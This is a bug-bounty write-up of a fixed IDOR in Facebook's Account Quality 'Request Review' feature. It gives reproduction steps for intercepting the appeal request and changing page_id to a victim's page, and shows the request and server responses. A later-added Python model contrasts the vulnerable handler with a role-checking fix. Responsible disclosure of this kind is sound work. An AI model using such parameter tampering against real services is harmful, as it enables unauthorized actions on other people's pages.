Sarmad Hassan

Published On: 30 Jul 2021

Request Review on behalf of other pages (no role in the page) in Account Quality

IDOR
Facebook | Web
---
LOW VALID

If an item in your catalog doesn't comply with Facebook Advertising Policies, you can't use it in Facebook ads. If an item doesn't comply with Facebook Commerce Policies, you can't sell it on Facebook or Instagram. Facebook therefore offers an option called "Request Review" that lets you request a second review; this can be done from Commerce Manager or from Account Quality. The bug occurs in "Account Quality".

Description

An attacker can request a second review from Commerce Manager or Account Quality. The bug occurs in "Account Quality", where the attacker can request a review on behalf of any page through an IDOR in the parameter "page_id=".

Impact

This allows the attacker to submit a request for review on behalf of any page, without having any role on the attacked page.

Reproduction Steps

Step 1

From the attacker account:
======================
1- Go to https://www.facebook.com/accountquality ==> Facebook Account ==> select any page you have ==> it will redirect you to the link below:
 
2- On the right side of your screen, under the phrase "Not an E-Commerce Business", click the Request Review button.
 
3- Check the two options ==> intercept with Burp Suite ==> hit Submit.
You should see a POST request like the one below:
POST /ads/async/advertiser_dashboard/appeal_information/?reason_for_appeal=1&page_id=Attacker_page_id&additional_info=&session_id=xxxx&__user=10001xxx&__a=1&__dyn=xxxxx
 
The vulnerable parameter is "page_id". Change its value to the victim's page id (the victim page should have ads running). You will see a response like the one below:
for (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":[],"ACEAdvertiserDashboardAppealStatus":"saving_failure"},"hsrp":{"hblp":{"sr_revision":1003529876,"consistency":{"rev":1003529876}}},"lid":"6945126556416951772"}
 
 
To confirm that the bug really exists, send the request again with the same victim page id; you will see a response like the one below:
for (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":["PAGE_APPEAL_IN_PROGRESS"],"ACEAdvertiserDashboardAppealStatus":"saving_failure"},"hsrp":{"hblp":{"sr_revision":1003529876,"consistency":{"rev":1003529876}}},"lid":"6945126633837606752"}
 
As you can see in the response above, the server returns "PAGE_APPEAL_IN_PROGRESS", which means the attacker's request for review was recorded against the victim page even though the attacker has no role on it.
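As an added illustration (not Facebook's code and not part of the original report), the Python model below reproduces the logic of the appeal endpoint in miniature: it parses a request path of the shape shown above, strips the "for (;;);" prefix from a response body, and places the vulnerable handler (which trusts the client-supplied page_id) beside a hardened one that authorizes page_id against the session user before touching any page state. The handler names, the PAGE_ROLES table, the user and page ids, and the "NOT_AUTHORIZED" and "saved" values are constructed assumptions; only the request path shape and the "PAGE_APPEAL_IN_PROGRESS" reject reason are taken from the report.

```python
# Added example (not Facebook's code): a small model of the Account Quality
# "Request Review" endpoint showing the IDOR beside a hardened version.
# PAGE_ROLES, the handler names and all ids below are constructed for
# illustration; only the request path shape and the PAGE_APPEAL_IN_PROGRESS
# reject reason come from the report above.
import json
from urllib.parse import urlsplit, parse_qs

# Constructed role table: session user id -> pages that user holds a role on.
PAGE_ROLES = {
    "10001": {"attacker_page"},
    "20002": {"victim_page"},
}

# Constructed request path, same shape as the POST in the report
# (attacker session, page_id swapped to a page they hold no role on).
SAMPLE_REQUEST = ("/ads/async/advertiser_dashboard/appeal_information/"
                  "?reason_for_appeal=1&page_id=victim_page&additional_info="
                  "&session_id=xxxx&__user=10001&__a=1")

# Constructed response body, same shape as the report's second response.
SAMPLE_RESPONSE = ('for (;;);{"__ar":1,"payload":{'
                   '"ACEAdvertiserDashboardAppealRejectReason":["PAGE_APPEAL_IN_PROGRESS"],'
                   '"ACEAdvertiserDashboardAppealStatus":"saving_failure"}}')


def parse_appeal_request(path):
    """Return the query parameters of an appeal request as single string values."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


def parse_fb_response(body):
    """Strip the 'for (;;);' anti-JSON-hijacking prefix and decode the JSON payload."""
    prefix = "for (;;);"
    if body.startswith(prefix):
        body = body[len(prefix):]
    return json.loads(body)


def user_has_role_on_page(user_id, page_id):
    """Authorization check: does the session user hold a role on this page?"""
    return page_id in PAGE_ROLES.get(user_id, set())


def handle_appeal_vulnerable(session_user, params, in_progress):
    """IDOR: page_id is taken from the client with no check against the session user."""
    page_id = params["page_id"]
    if page_id in in_progress:
        return {"reject_reason": ["PAGE_APPEAL_IN_PROGRESS"], "status": "saving_failure"}
    in_progress.add(page_id)
    return {"reject_reason": [], "status": "saved"}


def handle_appeal_hardened(session_user, params, in_progress):
    """Fix: authorize page_id against the session user before reading or writing page state."""
    page_id = params["page_id"]
    if not user_has_role_on_page(session_user, page_id):
        # Deny before any lookup, so the response cannot leak whether an
        # appeal is already pending on a page the caller does not own.
        return {"reject_reason": ["NOT_AUTHORIZED"], "status": "saving_failure"}
    if page_id in in_progress:
        return {"reject_reason": ["PAGE_APPEAL_IN_PROGRESS"], "status": "saving_failure"}
    in_progress.add(page_id)
    return {"reject_reason": [], "status": "saved"}


def demo():
    """Replay the report's two submissions against both handlers."""
    params = parse_appeal_request(SAMPLE_REQUEST)
    # The user identity must come from the authenticated session, never from
    # the __user query parameter, which the client controls just like page_id.
    session_user = "10001"
    vuln_state, hard_state = set(), set()
    vuln = [handle_appeal_vulnerable(session_user, params, vuln_state) for _ in range(2)]
    hard = [handle_appeal_hardened(session_user, params, hard_state) for _ in range(2)]
    return vuln, hard


if __name__ == "__main__":
    print(parse_fb_response(SAMPLE_RESPONSE)["payload"])
    print(demo())
```

Running demo() shows the report's behaviour on the vulnerable handler (first call recorded, second call rejected with PAGE_APPEAL_IN_PROGRESS) and the hardened handler rejecting both calls with NOT_AUTHORIZED, while a user who does hold a role on the page can still appeal. The important design point is that the ownership check runs before the in-progress lookup, so the second-submission probe used in the report no longer reveals anything about pages the caller does not own.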

Timeline

Sarmad, 29 Mar 2021: Initial Report
Facebook, 26 Apr 2021: Report Triaged
Facebook, 26 May 2021: Bounty awarded
Facebook, 28 Jun 2021: Bug Fixed
Sarmad, 30 Jun 2021: Fix Confirmed

VALID